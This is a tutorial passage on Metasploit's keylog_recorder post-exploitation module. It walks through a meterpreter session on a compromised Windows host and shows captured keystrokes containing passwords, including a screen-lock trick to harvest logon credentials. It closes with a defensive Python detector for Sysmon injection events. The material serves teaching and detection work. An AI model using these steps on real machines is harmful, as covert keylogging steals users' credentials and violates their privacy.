keylog_recorder
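The "keylog_recorder" module captures keystrokes on the compromised system. Note that you need to make sure you have migrated to an interactive process before capturing keystrokes.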
meterpreter >
Background session 1? [y/N] y
msf > use post/windows/capture/keylog_recorder
msf post(keylog_recorder) > info
Name: Windows Capture Keystroke Recorder
Module: post/windows/capture/keylog_recorder
Platform: Windows
Arch:
Rank: Normal
Provided by:
Carlos Perez
Josh Hale
Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  CAPTURE_TYPE  explorer         no        Capture keystrokes for Explorer, Winlogon or PID (Accepted: explorer, winlogon, pid)
  INTERVAL      5                no        Time interval to save keystrokes in seconds
  LOCKSCREEN    false            no        Lock system screen.
  MIGRATE       false            no        Perform Migration.
  PID                            no        Process ID to migrate to
  SESSION                        yes       The session to run this module on.
Description:
This module can be used to capture keystrokes. To capture keystrokes
when the session is running as SYSTEM, the MIGRATE option must be
enabled and the CAPTURE_TYPE option should be set to one of
Explorer, Winlogon, or a specific PID. To capture the keystrokes of
the interactive user, the Explorer option should be used with
MIGRATE enabled. Keep in mind that this will demote this session to
the user's privileges, so it makes sense to create a separate
session for this task. The Winlogon option will capture the username
and password entered into the logon and unlock dialog. The
LOCKSCREEN option can be combined with the Winlogon CAPTURE_TYPE to
for the user to enter their clear-text password. It is recommended
to run this module as a job, otherwise it will tie up your framework
user interface.
msf post(keylog_recorder) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter >
After we have finished sniffing keystrokes, or even while the sniffer is still running, we can dump the captured data.
root@kali:~# cat /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
Keystroke log started at Thu Apr 21 12:03:55 -0600 2011
root s3cr3t
ftp ftp.micro
soft.com anonymous anon@ano
n.com e quit
root@kali:~#
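From the defender's side, the MIGRATE step in the module description moves the session into explorer.exe or winlogon.exe by process injection, which Sysmon can record as Event ID 8 (CreateRemoteThread). The following is an added example, not part of the original page or of Metasploit: it flags such events in constructed sample records, and the allowlist, the sample data and the function name are assumptions.

```python
import ntpath

# CAPTURE_TYPE targets named in the module description; winlogon rates higher
# because it sees the credentials typed at the logon and unlock dialog.
WATCHED = {"explorer.exe": "medium", "winlogon.exe": "high"}
# Assumption: sources this environment expects to start threads in those processes.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}

# Constructed records using Sysmon field names; not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe", "SourceProcessId": 412,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 1608, "StartModule": "-"},
    {"EventID": 8, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe", "SourceProcessId": 3320,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 1608, "StartModule": "-"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ProcessId": 2900},
    {"EventID": 8, "SourceImage": r"C:\Windows\Temp\svc_helper.exe", "SourceProcessId": 2044,
     "TargetImage": r"C:\Windows\System32\winlogon.exe", "TargetProcessId": 620, "StartModule": "-"},
    {"EventID": 8, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe", "SourceProcessId": 3320,
     "TargetImage": r"C:\Windows\System32\notepad.exe", "TargetProcessId": 2900, "StartModule": "-"},
]

def suspicious_injections(events):
    """Return findings for remote-thread creation into the watched processes."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 8:
            continue  # only CreateRemoteThread events are relevant here
        target = ntpath.basename(ev.get("TargetImage", "")).lower()
        source = ev.get("SourceImage", "")
        if target not in WATCHED or source.lower() in ALLOWED_SOURCES:
            continue
        findings.append({
            "severity": WATCHED[target],
            "source": source,
            "source_pid": ev.get("SourceProcessId"),
            "target": target,
            "target_pid": ev.get("TargetProcessId"),
            # Assumption: StartModule is empty or "-" when the thread starts
            # outside any loaded module, as injected code does.
            "unbacked_start": ev.get("StartModule", "-") in ("", "-"),
        })
    # High-severity (winlogon) findings first; order is otherwise preserved.
    return sorted(findings, key=lambda f: f["severity"] != "high")

if __name__ == "__main__":
    for finding in suspicious_injections(SAMPLE_EVENTS):
        print(finding)
```

Other injection methods do not produce Event ID 8, so this check complements process-access and memory-scanning telemetry rather than replacing it.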